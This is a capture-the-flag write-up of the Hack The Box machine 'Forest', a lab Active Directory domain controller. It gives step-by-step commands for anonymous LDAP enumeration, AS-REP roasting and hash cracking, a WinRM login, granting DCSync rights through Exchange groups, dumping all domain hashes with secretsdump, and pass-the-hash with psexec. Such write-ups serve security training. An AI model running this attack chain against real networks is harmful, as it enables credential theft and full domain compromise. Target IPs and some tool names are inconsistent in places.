Machine Name: Forest OS: Windows Category: Active Directory Author: egre55 & mrb3n

Overview

Forest is an easy-difficulty Windows machine that represents a Domain Controller with Microsoft Exchange installed. The box demonstrates common Active Directory misconfigurations, including anonymous LDAP binds, Kerberos pre-authentication disabled on a service account, and over-privileged Exchange security groups. Exploitation ultimately leads to full domain compromise via a DCSync attack.

Enumeration

Nmap Scan

Initial port scanning reveals that the target is a Domain Controller:

nmap -Pn -sC -sV  -oA forest 10.129.32.118 -T4
None

Key findings:

  • LDAP (389, 3268)
  • Kerberos (88)
  • SMB (445)
  • WinRM (5985)
  • DNS (53)

The host identifies itself as FOREST.htb.local, confirming it is the domain controller for the htb.local domain.

The domain is added to /etc/hosts for proper resolution.

LDAP Enumeration (Anonymous Bind)

LDAP is tested for anonymous access:

ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"

The query succeeds without credentials, confirming null bind is enabled.

SO LETS PLAY WITH IT

enumerate ALL COMPUTERS

# FOREST, Domain Controllers, htb.local
dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
dNSHostName: FOREST.htb.local
# EXCH01, Computers, htb.local
dn: CN=EXCH01,CN=Computers,DC=htb,DC=local
dNSHostName: EXCH01.htb.local

Enumerate All Groups

┌──(kali㉿kali)-[~/HTB/forset]
└─$ ldapsearch -x -H ldap://10.129.32.118 -b "DC=htb,DC=local" "(objectClass=group)" cn

And We Get

Built-in / Default Groups

  • Users
  • Guests
  • Remote Desktop Users
  • Network Configuration Operators
  • Performance Monitor Users
  • Performance Log Users
  • Distributed COM Users
  • IIS_IUSRS
  • Cryptographic Operators
  • Event Log Readers
  • Certificate Service DCOM Access
  • RDS Remote Access Servers
  • RDS Endpoint Servers
  • RDS Management Servers
  • Hyper-V Administrators
  • Access Control Assistance Operators
  • Remote Management Users
  • System Managed Accounts Group
  • Storage Replica Administrators
  • Pre-Windows 2000 Compatible Access
  • Incoming Forest Trust Builders
  • Windows Authorization Access Group
  • Terminal Server License Servers

Domain Groups (Users Container)

  • Domain Computers
  • Cert Publishers
  • Domain Users
  • Domain Guests
  • Group Policy Creator Owners
  • RAS and IAS Servers
  • Allowed RODC Password Replication Group
  • Denied RODC Password Replication Group
  • Enterprise Read-only Domain Controllers
  • Cloneable Domain Controllers
  • Protected Users
  • Key Admins
  • Enterprise Key Admins
  • DnsAdmins
  • DnsUpdateProxy

Microsoft Exchange Security Groups

  • Organization Management
  • Recipient Management
  • View-Only Organization Management
  • Public Folder Management
  • UM Management
  • Help Desk
  • Records Management
  • Discovery Management
  • Server Management
  • Delegated Setup
  • Hygiene Management
  • Compliance Management
  • Security Reader
  • Security Administrator
  • Exchange Servers
  • Exchange Trusted Subsystem
  • Managed Availability Servers
  • Exchange Windows Permissions
  • ExchangeLegacyInterop

Other

  • Exchange Install Domain Servers
  • test

Built-in / Default Accounts

  • Guest
  • DefaultAccount

Computer Accounts

  • FOREST$
  • EXCH01$

Human User Accounts (Employees)

  • sebastien
  • lucinda
  • andy
  • mark
  • santi
  • svc-alfresco

Foothold — AS-REP Roasting

Based on known Alfresco setup behavior, the svc-alfresco account is suspected to have Kerberos pre-authentication disabled.

Using Impacket's GetNPUsers.py, an AS-REP hash is requested:

./GetNPUsers.py -dc-ip 10.129.32.118 'htb.local/' -request -outputfile asrep_hashes.txt

The encrypted TGT is successfully retrieved.

None

The hash is cracked using John the Ripper:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --force
None

Recovered credentials:

svc-alfresco : s3rvice

Initial Access

Since WinRM is exposed, the credentials are tested using Evil-WinRM:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
None

Authentication is successful, providing a shell as htb\svc-alfresco.

The user flag is obtained from:

C:\Users\svc-alfresco\Desktop\user.txt

Privilege Escalation — BloodHound Analysis

SharpHound is uploaded and executed to collect Active Directory data:

.\SharpHound.exe -c All

The data is imported into BloodHound for analysis.

None
None

Key findings:

  • svc-alfresco is a member of Account Operators (via nested groups).
  • Account Operators can create and modify users.
  • The Exchange Windows Permissions group has WriteDACL privileges over the domain.

This presents a clear path to DCSync.

Domain Escalation

A new domain user is created:

net user john abc123! /add /domain

The user is added to required groups:

net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add

Using PowerView, DCSync rights are granted:

Add-ObjectACL -PrincipalIdentity john -Rights DCSync

DCSync Attack

With DCSync privileges assigned, Impacket's secretsdump is used:

impacket-secretsdump htb/john@10.10.10.161

This successfully dumps NTLM hashes for all domain users, including Administrator.

Domain Admin Access

The Administrator NTLM hash is used to authenticate via psexec:

impacket-psexec administrator@10.10.10.161 -hashes <LM>:<NTLM>

A SYSTEM shell is obtained.

The root flag is retrieved from:

C:\Users\Administrator\Desktop\root.txt

Conclusion

Forest demonstrates how multiple low-severity Active Directory misconfigurations can be chained into a full domain compromise. Anonymous LDAP access enables extensive reconnaissance, Kerberos misconfiguration leads to credential exposure, and excessive Exchange privileges ultimately allow a DCSync attack.

This box is an excellent introduction to:

  • Active Directory enumeration
  • AS-REP roasting
  • BloodHound analysis
  • Exchange privilege abuse
  • DCSync attacks